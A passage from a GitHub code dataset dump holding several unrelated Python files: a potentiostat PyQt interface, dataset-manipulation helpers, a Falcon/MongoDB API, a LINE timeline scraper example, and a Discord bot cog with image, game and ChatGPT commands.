parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout=None)\r\n\r\n # Kirim ke Serial dulu\r\n if esp_serial.is_open:\r\n esp_serial.write((\"%.4f, %.4f, %.4f, %.4f, %.4f, %.4f, %.4f, %.4f\\r\\n\" % (self.NbCycle, self.Vmin, self.Vmax, self.ScanRate, self.Fmin, self.Fmax, self.PW, self.CurrRange)).encode(\"utf-8\"))\r\n\r\n # Conditions\r\n #self.styleComboBox.update()\r\n #if chosenMethod == \"CV\":\r\n # self.Fmin.setEnabled(False)\r\n # self.Fmax.setEnabled(False)\r\n # self.PW.setEnabled(False)\r\n # self.CurrRange.setEnabled(False)\r\n #if chosenMethod == \"DPV\":\r\n # self.NbCycle.setEnabled(False)\r\n # self.Fmin.setEnabled(False)\r\n # self.Fmax.setEnabled(False)\r\n # self.CurrRange.setEnabled(False)\r\n #if chosenMethod == \"EIS\":\r\n # self.NbCycle.setEnabled(False)\r\n # self.Vmin.setEnabled(False)\r\n # self.Vmax.setEnabled(False)\r\n #self.styleComboBox.update()\r\n\r\n # Push Buttons\r\n self.StartMeasurement = QPushButton(\"Start Measurement\")\r\n self.StartMeasurement.setDefault(True)\r\n self.StartMeasurement.move(20, 320)\r\n self.StopMeasurement = QPushButton(\"Stop Measurement\")\r\n self.StopMeasurement.setDefault(True)\r\n self.StopMeasurement.move(20, 350)\r\n\r\n # Notes field\r\n self.textEdit = QTextEdit()\r\n self.textEdit.setPlainText(\"Insert notes here\")\r\n\r\n # Set positions in grid layout\r\n layout = QGridLayout()\r\n layout.addWidget(self.StartMeasurement,9,0)\r\n layout.addWidget(self.StopMeasurement,9,1)\r\n layout.addWidget(self.textEdit,10,0,10,2)\r\n layout.addWidget(self.styleComboBox,0,1)\r\n layout.addWidget(self.styleLabel,0,0)\r\n layout.addWidget(self.NbCycle,1,1)\r\n layout.addWidget(self.NbCycleLabel,1,0)\r\n layout.addWidget(self.Vmin,2,1)\r\n layout.addWidget(self.VminLabel,2,0)\r\n layout.addWidget(self.Vmax,3,1)\r\n layout.addWidget(self.VmaxLabel,3,0)\r\n layout.addWidget(self.ScanRate,4,1)\r\n layout.addWidget(self.SRLabel,4,0)\r\n layout.addWidget(self.Fmin,5,1)\r\n layout.addWidget(self.FminLabel,5,0)\r\n layout.addWidget(self.Fmax,6,1)\r\n layout.addWidget(self.FmaxLabel,6,0)\r\n layout.addWidget(self.PW,7,1)\r\n layout.addWidget(self.PWLabel,7,0)\r\n layout.addWidget(self.CurrRange,8,1)\r\n layout.addWidget(self.CurrRangeLabel,8,0)\r\n\r\n\r\n\r\n # layout.addWidget(radioButton1)\r\n # layout.addWidget(radioButton2)\r\n # layout.addWidget(radioButton3)\r\n # layout.addWidget(checkBox)\r\n \r\n\r\n #layout.addStretch()\r\n self.topLeftGroupBox.setLayout(layout)\r\n\r\n def createTopRightGroupBox(self):\r\n self.topRightGroupBox = QGroupBox(\"Measurement Results\")\r\n\r\n defaultPushButton = QPushButton(\"Default Push Button\")\r\n defaultPushButton.setDefault(True)\r\n\r\n \r\n\r\n flatPushButton = QPushButton(\"Flat Push Button\")\r\n flatPushButton.setFlat(True)\r\n\r\n self.graphWidget = pg.PlotWidget()\r\n self.graphWidget.setBackground('w')\r\n #self.setCentralWidget(self.graphWidget)\r\n \r\n # Inisialisasi data yang ingin diplot\r\n voltage = []\r\n current = []\r\n voltage2 = []\r\n current2 = []\r\n\r\n # Inisialisasi ESP\r\n esp_serial = serial.Serial('COM3', 115200, bytesize=serial.EIGHTBITS, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout=None)\r\n\r\n # Terima hasil dari ESP yg diposting ke serial setelah pengukuran dilakukan\r\n if esp_serial.is_open:\r\n while True:\r\n try:\r\n len = esp_serial.in_waiting()\r\n if len:\r\n # Ambil data hasil pengukuran\r\n [vin, vout, arus] = [float(v) for v in (esp_serial.readline().decode(\"utf-8\").split(\"\\t\"))]\r\n \r\n voltage.append(vin)\r\n current.append(arus)\r\n \r\n except Exception as e:\r\n # plot data: x, y values\r\n self.graphWidget.plot(voltage, current, pen=pg.mkPen('b', width=3))\r\n self.graphWidget.plot(voltage2, current2, pen=pg.mkPen('r', width=3))\r\n self.graphWidget.setLabel('bottom', 'Voltage (V)')\r\n self.graphWidget.setLabel('left', 'Current (uA)')\r\n self.graphWidget.showGrid(x=True, y=True)\r\n break\r\n\r\n layout = QHBoxLayout()\r\n layout.addWidget(self.graphWidget)\r\n self.topRightGroupBox.setLayout(layout)\r\n\r\n def createProgressBar(self):\r\n self.progressBar = QProgressBar()\r\n self.progressBar.setRange(0, 10000)\r\n self.progressBar.setValue(0)\r\n\r\n timer = QTimer(self)\r\n timer.timeout.connect(self.advanceProgressBar)\r\n timer.start(1000)\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n import sys\r\n\r\n app = QApplication(sys.argv)\r\n gallery = WidgetGallery()\r\n gallery.show()\r\n sys.exit(app.exec())","repo_name":"tijekhaled/potentiostat_ui","sub_path":"pot_main.py","file_name":"pot_main.py","file_ext":"py","file_size_in_byte":11470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2797986051","text":"import numpy as np\nimport copy\n\n\ndef manipulate_adult(X):\n man_X = copy.deepcopy(X)\n for x0 in man_X:\n x0[8] = x0[8] + 7000\n\n return man_X\n\n\ndef manipulate_adult2(X):\n man_X = copy.deepcopy(X)\n for x0 in man_X:\n x0[0] -= 5\n x0[8] = x0[8] + 7000\n\n return man_X\n\n\ndef manipulate_credit_approval(X):\n man_X = copy.deepcopy(X)\n for x0 in man_X:\n x0[9] = (x0[9] + 1) % 2\n\n return man_X\n\n\ndef manipulate_bank_marketing(X):\n man_X = copy.deepcopy(X)\n for x0 in man_X:\n x0[13] = x0[13] + 4\n\n return man_X\n\n\n# def manipulate_cont_attribute(X, y, col_X_idx, factor):\n# ret_X = []\n# for x0, y0 in zip(X, y):\n# if y0 == 0:\n# x0[col_X_idx] = x0[col_X_idx] / factor\n# else:\n# x0[col_X_idx] = x0[col_X_idx] * factor\n\n# ret_X.append(x0)\n\n# return ret_X, y\n\n\n# def manipulate_adult_relationship_cgain(X, y, factor):\n# ret_X = []\n# for x0, y0 in zip(X, y):\n# if x0[8] == 0:\n# x0[8] = (-1 * factor)\n# else:\n# x0[8] = x0[8] * factor\n\n# x0[5] = (x0[5] + 1) % 6 # relationship has 6 possible values\n\n# ret_X.append(x0)\n\n# return ret_X, y\n\n# def manipulate_adult_relationship_cgain(X, y, factor):\n# man_X = copy.deepcopy(X)\n# for x0, y0 in zip(man_X, y):\n# if y0 == 0:\n# x0[10] = x0[10] - factor\n# x0[8] = x0[8] - factor\n# x0[5] = (x0[5] + 1) % 6\n# else:\n# x0[10] = x0[10] + factor\n# x0[8] = x0[8] + factor\n# x0[5] = (x0[5] + 1) % 6\n\n# return man_X\n\n\n# def manipulate_adult_relationship_cgain(X, y, factor):\n# man_X = copy.deepcopy(X)\n# for x0 in man_X:\n# x0[10] = x0[10] + factor\n# x0[8] = x0[8] + factor\n# x0[5] = (x0[5] + 1) % 6\n\n# return man_X, y\n\n\n# def manipulate_credit_A9_A15(X, y, factor):\n# ret_X = []\n# for x0, y0 in zip(X, y):\n# if y0 == 0:\n# x0[14] = x0[14] / factor\n# x0[8] = (x0[8] + 1) % 2 # A9 has 2 possible values\n# else:\n# x0[14] = x0[14] * factor\n# x0[8] = (x0[8] + 1) % 2 # A9 has 2 possible values\n\n# ret_X.append(x0)\n\n# return ret_X, y\n\n# def manipulate_credit_A9_A15(X, factor):\n# man_X = copy.deepcopy(X)\n# for x0 in man_X:\n# x0[14] = x0[14] / factor\n# x0[8] = (x0[8] + 1) % 2\n\n# return man_X\n\n\n# def manipulate_bank_marketing_duration_pdays(X, y, factor):\n# ret_X = []\n# for x0, y0 in zip(X, y):\n# if y0 == 0:\n# x0[11] = x0[11] / factor\n# x0[13] = x0[13] / factor\n# else:\n# x0[11] = x0[11] * factor\n# x0[13] = x0[13] * factor\n\n# ret_X.append(x0)\n\n# return ret_X, y\n\n\n# not in use\ndef manipulate_dataset_random(y):\n i = 1\n ret = []\n np.random.seed(9)\n y_rnd = np.random.randint(2, size=len(y))\n for y1, y1_rnd in zip(y, y_rnd):\n if (i % 2) == 0:\n ret.append(y1)\n else:\n ret.append(y1_rnd)\n i += 1\n return y_rnd\n\n\ndef manipulate_dataset_medianbased(idx2manipulate, X, y):\n median = np.median(X[idx2manipulate])\n ret1 = []\n ret2 = []\n\n for x, y in zip(X, y):\n if x[idx2manipulate] > median:\n ret1.append(1)\n ret2.append(0)\n else:\n ret1.append(y)\n ret2.append(y)\n\n return ret1, ret2\n","repo_name":"karltm/mocca-shap","sub_path":"diro2c/data/manipulate_data.py","file_name":"manipulate_data.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4822044267","text":"import falcon\nfrom bson.json_util import dumps\nfrom datetime import datetime\nfrom api.lib.mongoutils import mongoid\n\n\nclass Genres:\n VALID_ATTRIBUTES = [\n 'genre_title',\n ]\n\n REQUIRED_ATTRIBUTES = [\n 'genre_title',\n ]\n\n def on_get(self, req, resp, id=None):\n # Return a single genre details\n if id:\n id = mongoid(id)\n genre_details = self.db.genres.find_one({\"_id\": id}, {\"created\": 0})\n if genre_details:\n resp.body = dumps(genre_details)\n return\n # we didn't find the genre details\n resp.status = falcon.HTTP_404\n return\n\n # return all genres\n genre_list = []\n for genr in self.db.genres.find({}, {\"created\": 0}):\n genre_list.append(genr)\n\n resp.body = dumps(genre_list)\n return\n\n def on_post(self, req, resp, id=None):\n # grab data for new genre\n data = req.context['data'] if 'data' in req.context else None\n # sanity\n if not data:\n resp.status = falcon.HTTP_404\n resp.body = dumps({\"error\": \"Missing genre data\"})\n return\n\n # sanity check, do we have any invalid data\n for param in data:\n if param not in self.VALID_ATTRIBUTES:\n resp.status = falcon.HTTP_400\n resp.body = dumps({\"error\": f\"Invalid attribute {param}\"})\n return\n\n # do we have all essential data\n for param in self.REQUIRED_ATTRIBUTES:\n if param not in data:\n resp.status = falcon.HTTP_400\n resp.body = dumps({\"error\": f\"Missing required attribute {param}\"})\n return\n\n if id:\n id = mongoid(id)\n data['updated'] = datetime.utcnow()\n genre = self.db.genres.update_one(\n {\"_id\": id},\n {\"$set\": data}\n )\n if genre.matched_count != 1:\n resp.status = falcon.HTTP_404\n return\n resp.body = dumps({\"error\": \"ok\"})\n return\n\n data['created'] = datetime.utcnow()\n _id = self.db.genres.insert_one(data).inserted_id\n resp.body = dumps({\"error\": \"ok\", \"_id\": _id})\n return\n\n def on_delete(self, req, resp, id=None):\n\n # sanity\n if (not id):\n resp.status = falcon.HTTP_404\n resp.body = dumps({\"error\": \"Missing genre data\"})\n\n id = mongoid(id)\n\n self.db.genres.delete_one(\n {\"_id\": id}\n )\n\n return\n","repo_name":"bbbcube/MusicAPP","sub_path":"api/routes/genres.py","file_name":"genres.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32433175356","text":"def maxdepth(L):\n if isinstance(L, int):\n return 0\n else:\n max = 0\n for item in L:\n cur_max = 1 + maxdepth(item)\n if cur_max > max:\n max = cur_max\n return max\n\n\nsample_list = [0, [1, 2], [3, [4, 5]], [[6, [7]], 8]]\nprint('should print 4')\nprint(maxdepth(sample_list))","repo_name":"flaco99/Statistics-Course","sub_path":"cs12/recursive/maxdepth.py","file_name":"maxdepth.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69920213924","text":"# THIS IS AN EXAMPLE FILE\n# Gathering All Post and Comment from Line Official Account\n\nimport linelime\nimport json\nimport threading\nfrom copy import copy\n\n# Session ID from cookie\nsession = \"YOUR_SESSION_ID\"\n\n# Home ID from URL\nhome_id = \"_dc-7fplr21FHo7GOzNeg9XSmLgAineSgyAle1sE\" # Draft SMS UGM Home ID\n\nconfig = linelime.TimelineConfig()\nconfig.set_session(session)\nconfig.set_home_id(home_id)\nreader = linelime.TimelineReader(config)\n\nfeeds = []\n\nthreads = []\n\ndef get_feed_threading(reader):\n feed = reader.get_feed()\n result = {\n \"postId\" : feed[\"postId\"],\n \"likeCount\" : feed[\"likeCount\"],\n \"content\" : feed[\"content\"],\n \"comments\" : reader.fetch_comments()\n }\n feeds.append(result)\n\n # Save available data to txt file\n with open ('Draft_SMS_UGM.txt', 'a+', encoding=\"utf-8\") as f:\n f.write(json.dumps(result) + \"\\n\")\n\ndef run_threads(threads):\n for thread in threads:\n thread.start()\n for thread in threads:\n thread.join()\n\npage = 1\nwhile reader.fetch_page():\n print(\"Fetching page \" + str(page) + \"...\")\n while reader.fetch_feed() != None:\n threads.append(threading.Thread(target=get_feed_threading, args=(copy(reader),)))\n if page % 25 == 0:\n run_threads(threads)\n threads = []\n page += 1\n\nrun_threads(threads)\n\n# Save all data to JSON file after completed\ndata = {\n \"feeds\" : feeds\n}\nwith open ('Draft_SMS_UGM.json', 'w+', encoding=\"utf-8\") as f:\n f.write(json.dumps(data))\n","repo_name":"cacadosman/linelime","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"9680907880","text":"import asyncio\nimport io\nimport os\nimport random\nimport sys\nimport tempfile\n\nfrom typing import Literal, Optional\n\nimport discord\nimport openai\nimport uwupy # type: ignore\n\nfrom aiofiles import open as async_open\nfrom discord.ext import commands\n\nfrom helpers import checks, functions, regex, views, wock\n\n\nclass fun(commands.Cog, name=\"Fun\"):\n def __init__(self, bot):\n self.bot: wock.wockSuper = bot\n openai.api_key = self.bot.config[\"api\"][\"openai\"]\n self.eightball_responses = {\n \"As I see it, yes\": True,\n \"Better not tell you now\": False,\n \"Concentrate and ask again\": False,\n \"Don't count on it\": False,\n \"It is certain\": True,\n \"It is decidedly so\": True,\n \"Most likely\": True,\n \"My reply is no\": False,\n \"My sources say no\": False,\n \"Outlook good\": True,\n \"Outlook not so good\": False,\n \"Reply hazy, try again\": False,\n \"Signs point to yes\": True,\n \"Very doubtful\": False,\n \"Without a doub.\": True,\n \"Yes\": True,\n \"Yes, definitely\": True,\n \"You may rely on it\": True,\n \"Ask again later\": False,\n \"I can't predict now\": False,\n }\n\n # @commands.Cog.listener(\"on_user_message\")\n # async def save_wordcloud(self, ctx: wock.Context, message: discord.Message):\n # \"\"\"Save message content to metrics in order to use wordcloud\"\"\"\n\n # if not message.content:\n # return\n\n # if message.author.id in self.bot.owner_ids:\n # return\n\n # await self.bot.db.execute(\n # \"INSERT INTO metrics.messages VALUES ($1, $2, $3, $4, $5)\",\n # message.guild.id,\n # message.channel.id,\n # message.author.id,\n # message.content,\n # message.created_at,\n # )\n\n @commands.command(name=\"uwu\", usage=\"(text)\", example=\"hello mommy\", aliases=[\"uwuify\"])\n async def uwu(self, ctx: wock.Context, *, text: str):\n \"\"\"UwUify text\"\"\"\n\n await ctx.reply(uwupy.uwuify_str(text), allowed_mentions=discord.AllowedMentions.none())\n\n @commands.command(name=\"coinflip\", usage=\"\", example=\"heads\", aliases=[\"flipcoin\", \"cf\", \"fc\"])\n async def coinflip(self, ctx: wock.Context, *, side: Literal[\"heads\", \"tails\"] = None):\n \"\"\"Flip a coin\"\"\"\n\n await ctx.load(f\"Flipping a coin{f' and guessing **:coin: {side}**' if side else ''}..\")\n await asyncio.sleep(1)\n\n coin = random.choice([\"heads\", \"tails\"])\n await getattr(ctx, (\"approve\" if (not side or side == coin) else \"warn\"))(\n f\"The coin landed on **:coin: {coin}**\" + (f\", you **{'won' if side == coin else 'lost'}**!\" if side else \"!\")\n )\n\n @commands.command(name=\"roll\", usage=\"(sides)\", example=\"6\", aliases=[\"dice\"])\n async def roll(self, ctx: wock.Context, sides: int = 6):\n \"\"\"Roll a dice\"\"\"\n\n await ctx.load(f\"Rolling a **{sides}-sided** dice..\")\n await asyncio.sleep(1)\n\n await ctx.approve(f\"The dice landed on **🎲 {random.randint(1, sides)}**\")\n\n @commands.command(name=\"8ball\", usage=\"(question)\", example=\"am I pretty?\", aliases=[\"8b\"])\n async def eightball(self, ctx: wock.Context, *, question: str):\n \"\"\"Ask the magic 8ball a question\"\"\"\n\n await ctx.load(\"Shaking the **magic 8ball**..\")\n await asyncio.sleep(1)\n\n shakes = random.randint(1, 5)\n response = random.choice(list(self.eightball_responses.keys()))\n await getattr(ctx, (\"approve\" if self.eightball_responses[response] else \"warn\"))(\n f\"After {functions.plural(shakes, code=True):shake} - **{response}**\"\n )\n\n @commands.command(\n name=\"transparent\",\n usage=\"(image)\",\n example=\"dscord.com/chnls/999/..png\",\n parameters={\n \"alpha\": {\n \"require_value\": False,\n \"description\": \"Apply Alpha Matting to the image\",\n \"aliases\": [\"mask\"],\n }\n },\n aliases=[\"tp\"],\n )\n @checks.donator()\n @commands.cooldown(1, 10, commands.BucketType.user)\n @commands.max_concurrency(1, commands.BucketType.user)\n async def transparent(self, ctx: wock.Context, *, image: wock.ImageFinderStrict = None):\n \"\"\"Remove the background of an image\"\"\"\n\n image = image or await wock.ImageFinderStrict.search(ctx)\n\n async with ctx.typing():\n response = await self.bot.session.get(image)\n if sys.getsizeof(response.content) > 15728640:\n return await ctx.warn(\"Image is too large to make **transparent** (max 15MB)\")\n\n image = await response.read()\n\n with tempfile.TemporaryDirectory() as temp_dir:\n temp_file = os.path.join(\n temp_dir, f\"file{functions.hash(str(response.url))}.\" + regex.IMAGE_URL.match(str(response.url)).group(\"mime\")\n )\n temp_file_output = os.path.join(\n temp_dir, f\"file{functions.hash(str(response.url))}_output.\" + regex.IMAGE_URL.match(str(response.url)).group(\"mime\")\n )\n async with async_open(temp_file, \"wb\") as file:\n await file.write(image)\n\n try:\n terminal = await asyncio.wait_for(\n asyncio.create_subprocess_shell(\n f\"rembg i{' -a' if ctx.parameters.get('alpha') else ''} {temp_file} {temp_file_output}\",\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE,\n ),\n timeout=15,\n )\n stdout, stderr = await terminal.communicate()\n except asyncio.TimeoutError:\n return await ctx.warn(\"Couldn't make image **transparent** - Timeout\")\n\n if not os.path.exists(temp_file_output):\n return await ctx.warn(\"Couldn't make image **transparent**\")\n\n await ctx.reply(\n file=discord.File(temp_file_output),\n )\n\n @commands.command(\n name=\"legofy\",\n usage=\"(image)\",\n example=\"dscord.com/chnls/999/..png\",\n parameters={\n \"palette\": {\n \"converter\": str,\n \"description\": \"The LEGO palette to use\",\n \"default\": \"solid\",\n \"choices\": [\n \"solid\",\n \"transparent\",\n \"effects\",\n \"mono\",\n ],\n },\n \"size\": {\n \"converter\": int,\n \"description\": \"The amount of bricks to use\",\n \"default\": None,\n \"minimum\": 1,\n \"maximum\": 20,\n \"alises\": [\n \"scale\",\n ],\n },\n },\n aliases=[\"lego\"],\n )\n @commands.cooldown(1, 10, commands.BucketType.user)\n async def legofy(self, ctx: wock.Context, image: wock.ImageFinder = None):\n \"\"\"Legofy an image\"\"\"\n\n image = image or await wock.ImageFinder.search(ctx)\n if \".gif\" in image:\n return await ctx.warn(\"**GIFs** are not supported\")\n\n async with ctx.typing():\n response = await self.bot.session.get(image)\n if sys.getsizeof(response.content) > 15728640:\n return await ctx.warn(\"Image is too large to **legofy** (max 15MB)\")\n\n image = await response.read()\n\n with tempfile.TemporaryDirectory() as temp_dir:\n temp_file = os.path.join(\n temp_dir, f\"file{functions.hash(str(response.url))}.\" + regex.IMAGE_URL.match(str(response.url)).group(\"mime\")\n )\n async with async_open(temp_file, \"wb\") as file:\n await file.write(image)\n\n try:\n terminal = await asyncio.wait_for(\n asyncio.create_subprocess_shell(\n f\"legofy --palette {ctx.parameters.get('palette')} \"\n + (f\"--size {ctx.parameters.get('size')} \" if ctx.parameters.get(\"size\") else \"\")\n + f'\"{temp_file}\"',\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE,\n ),\n timeout=10,\n )\n stdout, stderr = await terminal.communicate()\n except asyncio.TimeoutError:\n return await ctx.warn(\"Couldn't **legofy** image - Timeout\")\n\n file = stdout.decode().split(\"will now legofy to \")[1].split(\"\\n\")[0].strip()\n\n if not os.path.exists(file):\n return await ctx.warn(\"Couldn't **legofy** image\")\n\n await ctx.reply(\n file=discord.File(file),\n )\n\n @commands.command(\n name=\"rotate\",\n usage=\"(image) \",\n example=\"dscord.com/chnls/999/..png 90\",\n )\n @commands.cooldown(1, 6, commands.BucketType.user)\n async def rotate(self, ctx: wock.Context, image: Optional[wock.ImageFinderStrict] = None, degree: int = 90):\n \"\"\"Rotate an image\"\"\"\n\n image = image or await wock.ImageFinderStrict.search(ctx)\n\n if degree < 1 or degree > 360:\n return await ctx.warn(\"Degree must be between **1** and **360**\")\n\n async with ctx.typing():\n response = await self.bot.session.get(image)\n if sys.getsizeof(response.content) > 15728640:\n return await ctx.warn(\"Image is too large to **rotate** (max 15MB)\")\n\n image = await response.read()\n\n buffer = await functions.rotate(image, degree)\n await ctx.reply(\n content=f\"Rotated **{degree}°** degree\" + (\"s\" if degree != 1 else \"\"),\n file=discord.File(buffer, filename=f\"wockRotate{functions.hash(str(response.url))}.png\"),\n )\n\n @commands.command(\n name=\"scrapbook\",\n usage=\"(text)\",\n example=\"wock so sexy\",\n aliases=[\"scrap\"],\n )\n @commands.max_concurrency(1, commands.BucketType.user)\n @commands.cooldown(1, 10, commands.BucketType.user)\n async def scrapbook(self, ctx: wock.Context, *, text: str):\n \"\"\"Make scrapbook letters\"\"\"\n\n if len(text) > 20:\n return await ctx.warn(\"Your text can't be longer than **20 characters**\")\n\n async with ctx.typing():\n response = await self.bot.session.get(\n \"https://api.jeyy.xyz/image/scrapbook\",\n params=dict(text=text),\n )\n if response.status != 200:\n return await ctx.warn(\"Couldn't **scrapbook** text - Try again later!\")\n\n image = await response.read()\n buffer = io.BytesIO(image)\n await ctx.reply(\n file=discord.File(\n buffer,\n filename=f\"wockScrapbook{functions.hash(text)}.gif\",\n )\n )\n\n @commands.command(name=\"tictactoe\", usage=\"(member)\", example=\"rx#1337\", aliases=[\"ttt\"])\n @commands.max_concurrency(1, commands.BucketType.member)\n async def tictactoe(self, ctx: wock.Context, member: wock.Member):\n \"\"\"Play Tic Tac Toe with another member\"\"\"\n\n if member == ctx.author:\n return await ctx.warn(\"You can't play against **yourself**\")\n elif member.bot:\n return await ctx.warn(\"You can't play against **bots**\")\n\n await views.TicTacToe(ctx, member).start()\n\n @commands.command(name=\"chatgpt\", usage=\"(prompt)\", example=\"I love you..\", aliases=[\"chat\", \"gpt\", \"ask\", \"ai\"])\n @commands.max_concurrency(1, commands.BucketType.member)\n @checks.donator()\n async def chatgpt(self, ctx: wock.Context, *, prompt: str):\n \"\"\"Interact with ChatGPT\"\"\"\n\n await ctx.typing()\n response = await openai.ChatCompletion.acreate(\n model=\"gpt-3.5-turbo\",\n max_tokens=300,\n messages=[\n {\n \"role\": \"user\",\n \"content\": prompt,\n }\n ],\n )\n\n message = (\n response[\"choices\"][0][\"message\"][\"content\"]\n .replace(\" As an AI language model, \", \"\")\n .replace(\"As an AI language model, \", \"\")\n .replace(\" but as an AI language model, \", \"\")\n )\n\n await ctx.reply(message, allowed_mentions=discord.AllowedMentions.none())\n\n @commands.group(\n name=\"blunt\",\n usage=\"(subcommand) \",\n example=\"pass rx#1337\",\n aliases=[\"joint\"],\n invoke_without_command=True,\n hidden=False,\n )\n async def blunt(self, ctx: wock.Context):\n \"\"\"Hit the blunt with your homies\"\"\"\n\n await ctx.send_help()\n\n @blunt.command(\n name=\"light\",\n aliases=[\"roll\"],\n hidden=False,\n )\n async def blunt_light(self, ctx: wock.Context):\n \"\"\"Roll up a blunt\"\"\"\n\n blunt = await self.bot.db.fetchrow(\n \"SELECT * FROM blunt WHERE guild_id = $1\",\n ctx.guild.id,\n )\n if blunt:\n user = ctx.guild.get_member(blunt.get(\"user_id\"))\n return await ctx.warn(\n f\"A **blunt** is already held by **{user or blunt.get('user_id')}**\\n> It has been hit\"\n f\" {functions.plural(blunt.get('hits'), bold=True):time} by {functions.plural(blunt.get('members'), bold=True):member}\",\n )\n\n await self.bot.db.execute(\n \"INSERT INTO blunt (guild_id, user_id) VALUES($1, $2)\",\n ctx.guild.id,\n ctx.author.id,\n )\n\n await ctx.load(\"Rolling the **blunt**..\", emoji=self.bot.config[\"styles\"][\"lighter\"].get(\"emoji\"))\n await asyncio.sleep(2)\n await ctx.approve(\n f\"Lit up a **blunt**\\n> Use `{ctx.prefix}blunt hit` to smoke it\",\n emoji=\"🚬\",\n )\n\n @blunt.command(\n name=\"pass\",\n usage=\"(member)\",\n example=\"rx#1337\",\n aliases=[\"give\"],\n hidden=False,\n )\n async def blunt_pass(self, ctx: wock.Context, *, member: wock.Member):\n \"\"\"Pass the blunt to another member\"\"\"\n\n blunt = await self.bot.db.fetchrow(\n \"SELECT * FROM blunt WHERE guild_id = $1\",\n ctx.guild.id,\n )\n if not blunt:\n return await ctx.warn(f\"There is no **blunt** to pass\\n> Use `{ctx.prefix}blunt light` to roll one up\")\n elif blunt.get(\"user_id\") != ctx.author.id:\n member = ctx.guild.get_member(blunt.get(\"user_id\"))\n return await ctx.warn(f\"You don't have the **blunt**!\\n> Steal it from **{member or blunt.get('user_id')}** first\")\n elif member == ctx.author:\n return await ctx.warn(\"You can't pass the **blunt** to **yourself**\")\n\n await self.bot.db.execute(\n \"UPDATE blunt SET user_id = $2, passes = passes + 1 WHERE guild_id = $1\",\n ctx.guild.id,\n member.id,\n )\n\n await ctx.approve(\n f\"The **blunt** has been passed to **{member}**!\\n> It has been passed around\"\n f\" {functions.plural(blunt.get('passes') + 1, bold=True):time}\",\n emoji=\"🚬\",\n )\n\n @blunt.command(\n name=\"steal\",\n aliases=[\"take\"],\n hidden=False,\n )\n @commands.cooldown(1, 60, commands.BucketType.member)\n async def blunt_steal(self, ctx: wock.Context):\n \"\"\"Steal the blunt from another member\"\"\"\n\n blunt = await self.bot.db.fetchrow(\n \"SELECT * FROM blunt WHERE guild_id = $1\",\n ctx.guild.id,\n )\n if not blunt:\n return await ctx.warn(f\"There is no **blunt** to steal\\n> Use `{ctx.prefix}blunt light` to roll one up\")\n elif blunt.get(\"user_id\") == ctx.author.id:\n return await ctx.warn(f\"You already have the **blunt**!\\n> Use `{ctx.prefix}blunt pass` to pass it to someone else\")\n\n member = ctx.guild.get_member(blunt.get(\"user_id\"))\n if member:\n if member.guild_permissions.manage_messages and not ctx.author.guild_permissions.manage_messages:\n return await ctx.warn(f\"You can't steal the **blunt** from **staff** members!\")\n\n # 50% chance that the blunt gets hogged\n if random.randint(1, 100) <= 50:\n return await ctx.warn(f\"**{member or blunt.get('user_id')}** is hogging the **blunt**!\")\n\n await self.bot.db.execute(\n \"UPDATE blunt SET user_id = $2 WHERE guild_id = $1\",\n ctx.guild.id,\n ctx.author.id,\n )\n\n await ctx.approve(\n f\"You just stole the **blunt** from **{member or blunt.get('user_id')}**!\",\n emoji=\"🚬\",\n )\n\n @blunt.command(\n name=\"hit\",\n aliases=[\"smoke\", \"chief\"],\n hidden=False,\n )\n @commands.max_concurrency(1, commands.BucketType.guild)\n async def blunt_hit(self, ctx: wock.Context):\n \"\"\"Hit the blunt\"\"\"\n\n blunt = await self.bot.db.fetchrow(\n \"SELECT * FROM blunt WHERE guild_id = $1\",\n ctx.guild.id,\n )\n if not blunt:\n return await ctx.warn(f\"There is no **blunt** to hit\\n> Use `{ctx.prefix}blunt light` to roll one up\")\n elif blunt.get(\"user_id\") != ctx.author.id:\n member = ctx.guild.get_member(blunt.get(\"user_id\"))\n return await ctx.warn(f\"You don't have the **blunt**!\\n> Steal it from **{member or blunt.get('user_id')}** first\")\n\n if not ctx.author.id in blunt.get(\"members\"):\n blunt[\"members\"].append(ctx.author.id)\n\n await ctx.load(\n \"Hitting the **blunt**..\",\n emoji=\"🚬\",\n )\n await asyncio.sleep(random.randint(1, 2))\n\n # 25% chance the blunt burns out\n if blunt[\"hits\"] + 1 >= 10 and random.randint(1, 100) <= 25:\n await self.bot.db.execute(\n \"DELETE FROM blunt WHERE guild_id = $1\",\n ctx.guild.id,\n )\n return await ctx.warn(\n f\"The **blunt** burned out after {functions.plural(blunt.get('hits') + 1, bold=True):hit} by\"\n f\" {functions.plural(blunt.get('members'), bold=True):member}\"\n )\n\n await self.bot.db.execute(\n \"UPDATE blunt SET hits = hits + 1, members = $2 WHERE guild_id = $1\",\n ctx.guild.id,\n blunt[\"members\"],\n )\n\n await ctx.approve(\n f\"You just hit the **blunt**!\\n> It has been hit {functions.plural(blunt.get('hits') + 1, bold=True):time} by\"\n f\" {functions.plural(blunt.get('members'), bold=True):member}\",\n emoji=\"🌬\",\n )\n\n\nasync def setup(bot: wock.wockSuper):\n await bot.add_cog(fun(bot))\n","repo_name":"hifthot/skidcity","sub_path":"wock/cogs/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":19042,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"1014518651","text":"import vk_api\nfrom random import randrange\nfrom vk_api.longpoll import VkLongPoll, VkEventType\n\nfrom pprint import pprint\n\nwith open('../file/token.txt', 'r') as file_object:\n token = file_object.read().strip()\n\nwith open('../file/token2.txt', 'r') as file_object:\n token2 = file_object.read().strip()\n\nsession = vk_api.VkApi(token=token)\nvk = vk_api.VkApi(token=token2)\nlongpoll = VkLongPoll(vk)\n\n\ndef 